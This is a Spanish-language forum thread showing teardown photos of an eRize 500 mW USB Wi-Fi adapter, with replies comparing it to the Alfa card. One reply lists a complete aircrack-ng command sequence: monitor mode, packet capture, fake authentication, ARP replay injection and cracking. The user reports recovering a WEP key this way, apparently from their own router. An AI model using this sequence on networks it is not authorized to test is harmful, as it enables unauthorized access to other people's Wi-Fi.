Calificación:
  • 0 voto(s) - 0 Media
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
Etiquetas
erize usb al erzw54 usb03h500 500 descubierto mwatios

Al Descubierto!: eRize ERZW54-USB03H500 - Usb 500 mwatios !!
[Imagen: ERZW54-USB03H500CW.jpg]

Marca:
eRize
Modelo: USB03H500
Tipo: USB

mas Info: Analisis: eRize ERZW54-USB03H500 - Usb 500 mwatios !!

Y aqui teneis las imagenes de este dispositivo que cuando he tenido oportunidad.. lo he abierto.. y aprovechando.. ZAS !!.. al Foro !!.

:rasta:

[Imagen: eRize500mw_Descubierto_Zero13_F4.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F5.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F6.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F7.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F8.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F9.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F10.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F11.jpg]

[Imagen: eRize500mw_Descubierto_Zero13_F12.jpg]
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Síguenos en TwitterYoutube

Responder
estoy por comprarmela pero dudo entre esta y la GOLD de 800mw
pero en 1 foro dicen que las gold no va bien que lo que an echo es falsear las calidades de recepcion,me explico si tienes 2 lineas con tu tarjeta con esta tienes 5 pero falseado.
nose..... por 30 leres creo que me la comprare.
Responder
quiza el mejor rendimiento de esta tarjeta respecto a la alfa es el pedazo de disipador de calor que tiene que hace que trabaje mas en su margen estable de temperatura
Responder
Que buen aporte , lo estaba esperando , se ve una buena terminación.
Zer13 ya que has probado las dos ,¿ Es mas o menos sensible en recepción que la alfa 500mw ?

Un saludo.
Responder
En las expecificaciones pone que tiene el Chipset Realtek 8187B ,es decir que no es el 8187L , hay quienes dicen que el L es mejor que el B.
El caso es que el precio es casi la mitad que la alfa de 500 Mw ,¿ sera que el chip 8187L es mas caro que el 8187B ?
Es muy raro ya que parece que la eRize ERZW54-USB03H500 Adaptador USB Wireless ultra high power 500 mW Chipset Realtek antena 5 dbi esta muy bien diseñada y parece (digo solo que parece) que tiene mas piezas o componentes dentro.
No me explico la diferencia de precios.Y es que hay mucha diferencia.

Un saludo
Responder
Yo personalmente me quedo con la eRize.. ademas, las pruebas con las antenas me ha gustado mas el rendimiento y la sensibilidad... y estabilidad de la eRize, en vez de la Alfa.

Pero.. como dicen, pa gusto!.. los colores!!.. jajaja
Big Grin

Bien es cierto!.. que me ha convencido mucho la electronica y como dicen.. el buen disipador que tiene para evitar cuelgues.. idas de olla.. etc. que pueden ser habituales en la Alfa.

Respecto al tema del coste del Chipset.. es curioso, pero siempre que un chipset se vende mucho.. y tiene tirada.. en este caso el L para temas de auditoria.. han podido por esta razon valorarlo mas en el mercado que el B, pudiendo ser este ultimo mucho mas sensible y funcionar mas estable.

Solo es mi opinion y segun las pruebas que estoy haciendo hasta el dia.
Wink
Zero13

"Así como el hierro se oxida por falta de uso, también la inactividad destruye el intelecto.." - Leonardo Da Vinci

Responder
Pues si Zero13,el disipador es un peazo de disipador,que por cierto no lo tiene la alfa.
Por cierto ,nunca he tenido cuelgues con la alfa.
Miro y veo que la "eRize ERZW54-USB03H500 Adaptador USB Wireless ultra high power 500 mW Chipset Realtek antena 5 dbi" tiene mas piezas ,es decir,mas componentes internos (muchos mas componentes internos),ademas te dan una antena de 5 Db cuando la alfa tiene una de 2 DB.
Reconoceras que es mosqueante ,o bien a la alfa le faltan piezas o es que a la Erize le sobran, je,je :cunao::cunao: Te dan mas componentes por menos dinero :cervezas:
¿¿ ??? Big GrinBig Grin
La verdad que habra que probarla en vista de los buenos resultados obtenidos por tus test ,Zero13. :ovacion:
Por cierto ,he visto un detalle enrrevesado,y es que la salida de antena desde la placa hasta el exterior lo hacen por medio de un cable ,no les hubiese costado nada el hacerlo directamente ;es decir,desde la placa al conector directamente. :dudas::dudas:
De todas formas los ingenieros sabran lo que hacen,digo yo .

Un saludo
Responder
bueno, son dos fabricantes distintos por eso lo del precio no viene a decir nada.
Esta misma tarjeta esta en dealextreme a uno 25 euros aproximadamente.
Lo que no me gusta es la potencia.Pone en la caja
modo g 15dbm +- 2 dbm o sea que se puede quedar en 13dbm
y en modo b pone 25dbm +- 2dbm.

O sea que lod 500mw son picos.
Responder
Hola, ¿esa targeta no es igual que esta? "distinto chipset.. esta con el L" :ghost: :

CompraWifi-GOLD USB REDUCIDO 500mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L) + Base magnetica + Bolsa de regalo

Un Saludo... Wink
Responder
ya tengo esta tarjeta en mis manos y tengo que decir.....

Que esta tarjeta falsea la calidad de recepcion.

1 no coje mas señales que antes
y las que coje te las muestra con mas intensidad (pero mentira todo)

no se como explicarlo bien pero hay algo que huele MAL....
Espero que alguien que la tenga de su opinion tambien...
esta tarjeta no da lo que dice que da.
la pena es no tener 1 medidor verdadero para ver que salida y entrada tiene en realidad

pero que es mas falsa que 1 moneda de 3íƒÆ’í‚¢íƒÂ¢í¢â€šÂ¬í…¡íƒâ€ší‚¬ FIJO
no quiero levantar polemica pero espero ansioso que alguien intente debatir con migo algooo
saludos y asta prontisimo
Responder
Me parece bien.. las criticas son buenas y siempre constructivas, asi que.. danos mas datos.. como has llegado a esa conclusion tecnicamente ??

* Que aplicacion utilizas para saberlo ??
* Hay ruido en tu zona ??
* Que AP ó APs utilizas ??
* Que version de firmware tiene tu tarjeta ??
* Que drivers utilizas ??
* Utilizas la antena original u otra RP-SMA ??
* Con que sistema operativo.. Linux, XP, Vista ??
* Etc.

Esperamos ansiosos tus respuestas.
Wink

Por cierto!.. hay un hilo para el Analisis para esta tarjeta, este hilo solo muestra la tarjeta abierta, responde aqui:

Analisis: eRize ERZW54-USB03H500 - Usb 500 mwatios !!
Zero13

Responder
Kuki debes tener algon problema en los drivers o en el hardware , yo prefiero la Erize 500mw a la Alfa500mw , por que aunque son muy parecidas , las dos son buenas , la erize da un plus , es mas rapida en la conexión y mas estable.
Puedo afirmar que la Erize da 1dbi mas que la Alfa , por que ahora he puesto un router con firmware ddr y veo la potencia con que me reciben en el colateral y con con la Erize gano 1dbi.

Un saludo.
Responder
Ante Todo , Saludos , Yo He Probado Ese Usb , Claro Con Otra Marca , La Fabrica Argtek , Y La Verdad Nbo Llega Ni A 100mw Comparado Con Un Usb De 100mw De La Misma Fabrica , Siento Decepcionarlos , Saludos
Responder
leolandeo escribió:Ante Todo , Saludos , Yo He Probado Ese Usb , Claro Con Otra Marca , La Fabrica Argtek , Y La Verdad Nbo Llega Ni A 100mw Comparado Con Un Usb De 100mw De La Misma Fabrica , Siento Decepcionarlos , Saludos
la de argtek es exactamente lo mismo que erize , cwgold o tambien la venden como oem, todas son high power(eso pone en las cajas, no se sabe realmente el fabricante), seguro que hay mas marcas que la distribuyen
Responder
leolandeo escribió:Ante Todo , Saludos , Yo He Probado Ese Usb , Claro Con Otra Marca , La Fabrica Argtek , Y La Verdad Nbo Llega Ni A 100mw Comparado Con Un Usb De 100mw De La Misma Fabrica , Siento Decepcionarlos , Saludos

Hola, asegurate que tu tarjeta de 500mw... no tenga algun problema, me extraña esa comparacion con la de 100 mw.
Zero13

Responder
Hola a todos,

Un duda que tengo, en el wirelessmoon con la erize-500mW me indica en la pantalla principal TX power a 100mW, no deberia poner a 500mW???????

Saludos!!

PD: soy nuevo en esto asi que perdonar si escribo alguna burrada.
Responder
Mu wenas ...

Pues he estado trasteando con esta tarjeta, y tengo experiencia previa con una Alpha 500 y debo decir que si va mejor, tanto en tarminos de rapidez de conexion como lo demas.

He leido por ay que ay gente con problemas de inyección pues aqui sigue lo que usado sin ningun tipo de problema contra um Linksys WAG200G:
------------------------------------------------
Distribuición: Slackware 13 FULL INSTALL
Aircrack: aircrack-ng-1.0.tar
------------------------------------------------
Sacar el aircrack y instalar:

tar -zxvf aircrack-ng-1.0.tar
cd aircrack-ng-1.0
make
make install

Despues e utilizado:

airmon-ng start wlanX(vuestro interfaz de rede)

(el creara el interfaz monX(depiende si a otros interfaz de monitor pero si no sera el 0)

airodump-ng monX -c(canal) -i /ruta/capturas

aireplay-ng -1 30 -e ESSID -a MACAP -h MACTARJETA monX

aireplay-ng -3 x300 -b MACAP -h MACTARJETA monx

(esperad un poquito y vereis los paquetes volando, me ha subido hasta 700#/s pero eso si tenia el router al lado)

(asi que tengais algunos paquetes 50.000 p.e.)

aircrack-ng -a 1 -x2 /ruta/capturas

E asi de pronto en menos de 15m tenia la contraseña wep en las manos ...
Perdonad por no poner capturas pero estaba trabajando en CLI luego mas volvere a probar contra otro AP que tengo por aqui y si hare capturas y un tutorial guapito.

Bueno, perdonad mi castellano pero si no lo habeis notado no es mi lengua nativa, soy portugues Smile jeje quiero agradezcer al foro pues apesar de "invisible" me ha ayudado mucho en entrar en el tema de monitoreo y mi nueva passion, la fabricacion de antenas.

PD: Lo que me gustaria poner las manos en la de 1W Big Grin Big Grin
Responder
sera el mismo producto, http://www.rfsupplier.com/product_info.p...ts_id=1021, tiene el mismo chipset, pero no dice su marca por ningun lado, y las especificaciones estan interesantes sobre todo esta la numero 7 "Support Software AP mode and WMMTM (Wi-Fi Multimedia) function", ¿que opinan?
Responder
Hola! soy nuevo en el foro y no se como meter un tema nuevo.
Hace poco compre un eRize ERZW54-USB04RS800 en Ciudad Wireless, la verdad esta bastante bien, tengo algunas fotos de esta tarjeta.
Me gustaria saber si se puede hacer Auditoria con este adaptador.
Muchas Gracias a todos, este foro es el mejor de de la red, espero que siga siendolo durante mucho tiempo. un saludo a la gente del foro..
Responder
Hola,

Alguien conoce alguna tienda en Madrid donde vendan la eRize ERZW54 o la Alfa Network AWUS036H ??

Muchas gracias >Sad
Responder

Posibles temas similares...
Tema Autor Respuestas Vistas Último mensaje
  Al descubierto Rosewill RNX-N2LX ( tarjeta de grupo 4 ) mandarache 0 2,245 20-07-2014, 12:44
Último mensaje: mandarache
  UBIQUITI WIFISTATION EXT 1000mW USB ( Al Descubierto! ) por Txetxu txetxu 38 22,273 29-03-2012, 12:12
Último mensaje: maquia
  Wifi-Link 1 Watt USB al descubierto! por Sektor SEKTOR 6 7,156 27-01-2012, 16:03
Último mensaje: vicent_nb1
  USB al Descubierto!: Zydas Druz Zero13 8 13,491 26-05-2011, 07:42
Último mensaje: ak_
  Al Descubierto: USB Dlink DWA-110 Zero13 0 10,708 21-04-2011, 23:29
Último mensaje: jackocoman
  Al Descubierto!: Alfa USB AWUS036NH - 2 Watios Zero13 6 11,486 19-09-2010, 02:00
Último mensaje: ak_
  usb wifi marca nexxt al descubierto victorx 0 6,566 15-10-2009, 08:18
Último mensaje: mandarache
  Al descubierto: EDUP Palm WLAN USB RTL8187L 500mw 0 10,162 24-08-2009, 23:34
Último mensaje: espadan
  USB al Descubierto!: Buffalo WLI-U2-KG125-3 Zero13 1 5,877 14-05-2009, 15:47
Último mensaje: pepitogrande
  Al Descubierto: Gigafast WF748-CUI - USB Zero13 6 9,241 14-05-2009, 08:11
Último mensaje: pepitogrande

Salto de foro:

Usuarios navegando en este tema: 1 invitado(s)